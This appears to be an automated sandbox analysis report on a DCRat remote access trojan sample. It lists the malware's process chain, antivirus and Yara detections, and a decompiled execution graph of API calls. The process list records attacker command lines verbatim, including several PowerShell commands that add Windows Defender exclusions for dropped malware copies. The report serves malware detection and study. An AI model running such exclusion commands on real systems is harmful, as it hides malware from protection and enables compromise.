                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Jan 3, 2025 07:59:29.904002905 CET2516OUTData Raw: 5b 54 5e 59 58 5c 50 5b 54 5b 59 5a 5b 5e 57 58 5f 55 5a 58 52 50 50 41 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [T^YX\P[T[YZ[^WX_UZXRPPAZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&A)-"#:(2?>;%%7%\&/%6B> (Y'<D$/'()#Y'$X.


                                                                                                                                                                        Statistics

                                                                                                                                                                        CPU Usage

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Memory Usage

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                        Behavior

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        System Behavior

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:0
                                                                                                                                                                        Start time:01:57:04
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Users\user\Desktop\updIMdPUj8.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\updIMdPUj8.exe"
                                                                                                                                                                        Imagebase:0xb20000
                                                                                                                                                                        File size:2'937'141 bytes
                                                                                                                                                                        MD5 hash:BC1FB66921DB74A0051917B26A4BD316
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:1
                                                                                                                                                                        Start time:01:57:04
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\BridgeSavesMonitor\wW6msodKQlyf4uIuEtxxIN9vzHkuk0mZkwmTg.vbe"
                                                                                                                                                                        Imagebase:0x230000
                                                                                                                                                                        File size:147'456 bytes
                                                                                                                                                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:3
                                                                                                                                                                        Start time:01:57:21
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\BridgeSavesMonitor\PiJ39TM3MwLHVAF8MIz1L5IKE7LQcw3.bat" "
                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:4
                                                                                                                                                                        Start time:01:57:21
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:5
                                                                                                                                                                        Start time:01:57:21
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\BridgeSavesMonitor/hypersurrogateComponentdhcp.exe"
                                                                                                                                                                        Imagebase:0xba0000
                                                                                                                                                                        File size:2'615'296 bytes
                                                                                                                                                                        MD5 hash:8A121B557A98B065A7CD2EB30882362D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000000.1842993642.0000000000BA2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe, Author: Joe Security
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                        • Detection: 78%, ReversingLabs
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:7
                                                                                                                                                                        Start time:01:57:24
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe'
                                                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:8
                                                                                                                                                                        Start time:01:57:24
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\ZWgKQlTqcrSB.exe'
                                                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:9
                                                                                                                                                                        Start time:01:57:24
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:10
                                                                                                                                                                        Start time:01:57:24
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\csrss.exe'
                                                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:11
                                                                                                                                                                        Start time:01:57:24
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\ZWgKQlTqcrSB.exe'
                                                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:12
                                                                                                                                                                        Start time:01:57:24
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:13
                                                                                                                                                                        Start time:01:57:24
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\Accessories\ZWgKQlTqcrSB.exe'
                                                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:14
                                                                                                                                                                        Start time:01:57:24
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:15
                                                                                                                                                                        Start time:01:57:24
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:16
                                                                                                                                                                        Start time:01:57:24
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:17
                                                                                                                                                                        Start time:01:57:25
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\UV4iXMFwPx.bat"
                                                                                                                                                                        Imagebase:0x7ff6b6600000
                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:18
                                                                                                                                                                        Start time:01:57:25
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:19
                                                                                                                                                                        Start time:01:57:26
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\chcp.com
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:chcp 65001
                                                                                                                                                                        Imagebase:0x7ff785310000
                                                                                                                                                                        File size:14'848 bytes
                                                                                                                                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:22
                                                                                                                                                                        Start time:01:57:27
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:ping -n 10 localhost
                                                                                                                                                                        Imagebase:0x7ff7aa2e0000
                                                                                                                                                                        File size:22'528 bytes
                                                                                                                                                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:23
                                                                                                                                                                        Start time:01:57:32
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                        Imagebase:0x7ff693ab0000
                                                                                                                                                                        File size:496'640 bytes
                                                                                                                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:24
                                                                                                                                                                        Start time:01:57:37
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Windows\TAPI\ZWgKQlTqcrSB.exe"
                                                                                                                                                                        Imagebase:0x800000
                                                                                                                                                                        File size:2'615'296 bytes
                                                                                                                                                                        MD5 hash:8A121B557A98B065A7CD2EB30882362D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.2935880086.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.2935880086.0000000003199000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 78%, ReversingLabs
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:26
                                                                                                                                                                        Start time:01:57:42
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                        Imagebase:0x7ff6eef20000
                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Disassembly

                                                                                                                                                                        Reset < >

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:9.6%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:9.3%
                                                                                                                                                                          Total number of Nodes:1511
                                                                                                                                                                          Total number of Limit Nodes:42
                                                                                                                                                                          execution_graph 23392 b3f3b2 23393 b3f3be ___scrt_is_nonwritable_in_current_image 23392->23393 23424 b3eed7 23393->23424 23395 b3f3c5 23396 b3f518 23395->23396 23399 b3f3ef 23395->23399 23497 b3f838 4 API calls 2 library calls 23396->23497 23398 b3f51f 23490 b47f58 23398->23490 23411 b3f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23399->23411 23435 b48aed 23399->23435 23406 b3f40e 23408 b3f48f 23443 b3f953 GetStartupInfoW __cftof 23408->23443 23410 b3f495 23444 b48a3e 51 API calls 23410->23444 23411->23408 23493 b47af4 38 API calls _abort 23411->23493 23414 b3f49d 23445 b3df1e 23414->23445 23418 b3f4b1 23418->23398 23419 b3f4b5 23418->23419 23420 b3f4be 23419->23420 23495 b47efb 28 API calls _abort 23419->23495 23496 b3f048 12 API calls ___scrt_uninitialize_crt 23420->23496 23423 b3f4c6 23423->23406 23425 b3eee0 23424->23425 23499 b3f654 IsProcessorFeaturePresent 23425->23499 23427 b3eeec 23500 b42a5e 23427->23500 23429 b3eef1 23434 b3eef5 23429->23434 23508 b48977 23429->23508 23432 b3ef0c 23432->23395 23434->23395 23436 b48b04 23435->23436 23437 b3fbbc _ValidateLocalCookies 5 API calls 23436->23437 23438 b3f408 23437->23438 23438->23406 23439 b48a91 23438->23439 23440 b48ac0 23439->23440 23441 b3fbbc _ValidateLocalCookies 5 API calls 23440->23441 23442 b48ae9 23441->23442 23442->23411 23443->23410 23444->23414 23646 b30863 23445->23646 23449 b3df3d 23695 b3ac16 23449->23695 23451 b3df46 __cftof 23452 b3df59 GetCommandLineW 23451->23452 23453 b3dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23452->23453 23454 b3df68 23452->23454 23710 b24092 23453->23710 23699 b3c5c4 23454->23699 23460 b3dfe0 23704 b3dbde 23460->23704 23461 b3df76 OpenFileMappingW 23464 b3dfd6 CloseHandle 23461->23464 23465 b3df8f MapViewOfFile 23461->23465 23464->23453 23467 b3dfa0 __InternalCxxFrameHandler 23465->23467 23468 b3dfcd UnmapViewOfFile 23465->23468 23472 b3dbde 2 API calls 23467->23472 23468->23464 23474 b3dfbc 23472->23474 23473 b390b7 8 API calls 23475 b3e0aa DialogBoxParamW 23473->23475 23474->23468 23476 b3e0e4 23475->23476 23477 b3e0f6 Sleep 23476->23477 23478 b3e0fd 23476->23478 23477->23478 23481 b3e10b 23478->23481 23743 b3ae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 23478->23743 23480 b3e12a DeleteObject 23482 b3e146 23480->23482 23483 b3e13f DeleteObject 23480->23483 23481->23480 23484 b3e177 23482->23484 23485 b3e189 23482->23485 23483->23482 23744 b3dc3b 6 API calls 23484->23744 23740 b3ac7c 23485->23740 23487 b3e17d CloseHandle 23487->23485 23489 b3e1c3 23494 b3f993 GetModuleHandleW 23489->23494 24029 b47cd5 23490->24029 23493->23408 23494->23418 23495->23420 23496->23423 23497->23398 23499->23427 23512 b43b07 23500->23512 23504 b42a6f 23505 b42a7a 23504->23505 23526 b43b43 DeleteCriticalSection 23504->23526 23505->23429 23507 b42a67 23507->23429 23555 b4c05a 23508->23555 23511 b42a7d 7 API calls 2 library calls 23511->23434 23513 b43b10 23512->23513 23515 b43b39 23513->23515 23517 b42a63 23513->23517 23527 b43d46 23513->23527 23532 b43b43 DeleteCriticalSection 23515->23532 23517->23507 23518 b42b8c 23517->23518 23548 b43c57 23518->23548 23522 b42baf 23523 b42bbc 23522->23523 23554 b42bbf 6 API calls ___vcrt_FlsFree 23522->23554 23523->23504 23525 b42ba1 23525->23504 23526->23507 23533 b43c0d 23527->23533 23530 b43d7e InitializeCriticalSectionAndSpinCount 23531 b43d69 23530->23531 23531->23513 23532->23517 23534 b43c26 23533->23534 23535 b43c4f 23533->23535 23534->23535 23540 b43b72 23534->23540 23535->23530 23535->23531 23538 b43c3b GetProcAddress 23538->23535 23539 b43c49 23538->23539 23539->23535 23545 b43b7e ___vcrt_FlsSetValue 23540->23545 23541 b43bf3 23541->23535 23541->23538 23542 b43b95 LoadLibraryExW 23543 b43bb3 GetLastError 23542->23543 23544 b43bfa 23542->23544 23543->23545 23544->23541 23546 b43c02 FreeLibrary 23544->23546 23545->23541 23545->23542 23547 b43bd5 LoadLibraryExW 23545->23547 23546->23541 23547->23544 23547->23545 23549 b43c0d ___vcrt_FlsSetValue 5 API calls 23548->23549 23550 b43c71 23549->23550 23551 b43c8a TlsAlloc 23550->23551 23552 b42b96 23550->23552 23552->23525 23553 b43d08 6 API calls ___vcrt_FlsSetValue 23552->23553 23553->23522 23554->23525 23558 b4c077 23555->23558 23559 b4c073 23555->23559 23557 b3eefe 23557->23432 23557->23511 23558->23559 23561 b4a6a0 23558->23561 23573 b3fbbc 23559->23573 23562 b4a6ac ___scrt_is_nonwritable_in_current_image 23561->23562 23580 b4ac31 EnterCriticalSection 23562->23580 23564 b4a6b3 23581 b4c528 23564->23581 23566 b4a6c2 23567 b4a6d1 23566->23567 23594 b4a529 29 API calls 23566->23594 23596 b4a6ed LeaveCriticalSection _abort 23567->23596 23570 b4a6cc 23595 b4a5df GetStdHandle GetFileType 23570->23595 23571 b4a6e2 _abort 23571->23558 23574 b3fbc5 IsProcessorFeaturePresent 23573->23574 23575 b3fbc4 23573->23575 23577 b3fc07 23574->23577 23575->23557 23645 b3fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23577->23645 23579 b3fcea 23579->23557 23580->23564 23582 b4c534 ___scrt_is_nonwritable_in_current_image 23581->23582 23583 b4c541 23582->23583 23584 b4c558 23582->23584 23605 b491a8 20 API calls __dosmaperr 23583->23605 23597 b4ac31 EnterCriticalSection 23584->23597 23587 b4c546 23606 b49087 26 API calls __cftof 23587->23606 23589 b4c550 _abort 23589->23566 23590 b4c590 23607 b4c5b7 LeaveCriticalSection _abort 23590->23607 23591 b4c564 23591->23590 23598 b4c479 23591->23598 23594->23570 23595->23567 23596->23571 23597->23591 23608 b4b136 23598->23608 23600 b4c498 23622 b48dcc 23600->23622 23601 b4c48b 23601->23600 23615 b4af0a 23601->23615 23604 b4c4ea 23604->23591 23605->23587 23606->23589 23607->23589 23613 b4b143 _abort 23608->23613 23609 b4b16e RtlAllocateHeap 23611 b4b181 23609->23611 23609->23613 23610 b4b183 23629 b491a8 20 API calls __dosmaperr 23610->23629 23611->23601 23613->23609 23613->23610 23628 b47a5e 7 API calls 2 library calls 23613->23628 23630 b4ac98 23615->23630 23618 b4af4f InitializeCriticalSectionAndSpinCount 23620 b4af3a 23618->23620 23619 b3fbbc _ValidateLocalCookies 5 API calls 23621 b4af66 23619->23621 23620->23619 23621->23601 23623 b48e00 _free 23622->23623 23624 b48dd7 RtlFreeHeap 23622->23624 23623->23604 23624->23623 23625 b48dec 23624->23625 23644 b491a8 20 API calls __dosmaperr 23625->23644 23627 b48df2 GetLastError 23627->23623 23628->23613 23629->23611 23631 b4acc8 23630->23631 23634 b4acc4 23630->23634 23631->23618 23631->23620 23632 b4ace8 23632->23631 23635 b4acf4 GetProcAddress 23632->23635 23634->23631 23634->23632 23637 b4ad34 23634->23637 23636 b4ad04 _abort 23635->23636 23636->23631 23638 b4ad55 LoadLibraryExW 23637->23638 23639 b4ad4a 23637->23639 23640 b4ad72 GetLastError 23638->23640 23641 b4ad8a 23638->23641 23639->23634 23640->23641 23642 b4ad7d LoadLibraryExW 23640->23642 23641->23639 23643 b4ada1 FreeLibrary 23641->23643 23642->23641 23643->23639 23644->23627 23645->23579 23745 b3ec50 23646->23745 23649 b308e7 23651 b30c14 GetModuleFileNameW 23649->23651 23756 b475fb 42 API calls __vsnwprintf_l 23649->23756 23650 b30888 GetProcAddress 23652 b308a1 23650->23652 23653 b308b9 GetProcAddress 23650->23653 23663 b30c32 23651->23663 23652->23653 23655 b308cb 23653->23655 23655->23649 23656 b30b54 23656->23651 23657 b30b5f GetModuleFileNameW CreateFileW 23656->23657 23658 b30c08 CloseHandle 23657->23658 23659 b30b8f SetFilePointer 23657->23659 23658->23651 23659->23658 23660 b30b9d ReadFile 23659->23660 23660->23658 23662 b30bbb 23660->23662 23662->23658 23667 b3081b 2 API calls 23662->23667 23665 b30c94 GetFileAttributesW 23663->23665 23666 b30cac 23663->23666 23668 b30c5d CompareStringW 23663->23668 23747 b2b146 23663->23747 23750 b3081b 23663->23750 23665->23663 23665->23666 23669 b30cb7 23666->23669 23672 b30cec 23666->23672 23667->23662 23668->23663 23671 b30cd0 GetFileAttributesW 23669->23671 23674 b30ce8 23669->23674 23670 b30dfb 23694 b3a64d GetCurrentDirectoryW 23670->23694 23671->23669 23671->23674 23672->23670 23673 b2b146 GetVersionExW 23672->23673 23675 b30d06 23673->23675 23674->23672 23676 b30d73 23675->23676 23677 b30d0d 23675->23677 23678 b24092 _swprintf 51 API calls 23676->23678 23679 b3081b 2 API calls 23677->23679 23680 b30d9b AllocConsole 23678->23680 23681 b30d17 23679->23681 23682 b30df3 ExitProcess 23680->23682 23683 b30da8 GetCurrentProcessId AttachConsole 23680->23683 23684 b3081b 2 API calls 23681->23684 23761 b43e13 23683->23761 23686 b30d21 23684->23686 23757 b2e617 23686->23757 23687 b30dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23687->23682 23690 b24092 _swprintf 51 API calls 23691 b30d4f 23690->23691 23692 b2e617 53 API calls 23691->23692 23693 b30d5e 23692->23693 23693->23682 23694->23449 23696 b3081b 2 API calls 23695->23696 23697 b3ac2a OleInitialize 23696->23697 23698 b3ac4d GdiplusStartup SHGetMalloc 23697->23698 23698->23451 23703 b3c5ce 23699->23703 23700 b3c6e4 23700->23460 23700->23461 23701 b31fac CharUpperW 23701->23703 23703->23700 23703->23701 23786 b2f3fa 82 API calls 2 library calls 23703->23786 23705 b3ec50 23704->23705 23706 b3dbeb SetEnvironmentVariableW 23705->23706 23708 b3dc0e 23706->23708 23707 b3dc36 23707->23453 23708->23707 23709 b3dc2a SetEnvironmentVariableW 23708->23709 23709->23707 23787 b24065 23710->23787 23713 b3b6dd LoadBitmapW 23714 b3b70b GetObjectW 23713->23714 